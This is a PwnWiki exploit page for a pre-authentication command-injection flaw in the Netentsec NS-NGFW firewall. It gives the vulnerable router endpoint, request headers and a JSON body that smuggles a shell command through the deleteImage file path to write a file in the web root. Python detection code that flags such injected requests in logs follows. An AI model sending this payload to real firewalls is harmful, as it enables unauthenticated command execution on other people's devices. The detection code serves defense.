Qi An Xin NS-NGFW (Netentsec Firewall) Pre-Auth RCE Vulnerability

From PwnWiki
Revision as of 12:54, 11 April 2021 by Pwnwiki

Exploitation

Vulnerability location:

http://xx.xx.xx.xx/directdata/direct/router

RequestHeader

Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15(KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 155
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip


RequestBody

{
    "action": "SSLVPN_Resource",
    "method": "deleteImage",
    "data":[{
    	"data":["/var/www/html/b.txt;echo'fa3a6469'>/var/www/html/fa3a6.txt"]
    }],
    "type": "rpc",
    "tid": 17

}
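
Detection

The request above places `;` and `>` inside the path argument of `SSLVPN_Resource` / `deleteImage`. The following check for that pattern in logged request bodies is an added example, not part of the original page or the vendor's code. The function name, the sample bodies and the handling of a JSON array of calls are assumptions.

```python
import json
import re

ENDPOINT = "/directdata/direct/router"      # path shown on the page
SHELL_META = re.compile(r"[;&|`$<>\r\n]")   # separators and redirections

def _strings(value):
    """Yield every string nested inside a decoded JSON value."""
    if isinstance(value, str):
        yield value
    elif isinstance(value, dict):
        for item in value.values():
            yield from _strings(item)
    elif isinstance(value, list):
        for item in value:
            yield from _strings(item)

def suspicious_delete_image(path, body):
    """Return deleteImage arguments that contain shell metacharacters."""
    if not path.split("?", 1)[0].endswith(ENDPOINT):
        return []
    try:
        doc = json.loads(body)
    except (TypeError, ValueError):
        return []                            # not JSON: nothing to inspect
    calls = doc if isinstance(doc, list) else [doc]  # assumption: batches possible
    hits = []
    for call in calls:
        if not isinstance(call, dict):
            continue
        if (call.get("action"), call.get("method")) != ("SSLVPN_Resource", "deleteImage"):
            continue
        hits.extend(s for s in _strings(call.get("data")) if SHELL_META.search(s))
    return hits

# Constructed sample bodies (not captured traffic).
BENIGN = json.dumps({"action": "SSLVPN_Resource", "method": "deleteImage",
                     "data": [{"data": ["/var/www/html/logo.png"]}],
                     "type": "rpc", "tid": 1})
INJECTED = json.dumps({"action": "SSLVPN_Resource", "method": "deleteImage",
                       "data": [{"data": ["/var/www/html/logo.png;PLACEHOLDER>out"]}],
                       "type": "rpc", "tid": 2})

if __name__ == "__main__":
    for name, body in (("benign", BENIGN), ("injected", INJECTED)):
        print(name, suspicious_delete_image(ENDPOINT, body))
```

A legitimate file name containing one of these characters would also be flagged, so treat hits as leads to review rather than confirmed compromise.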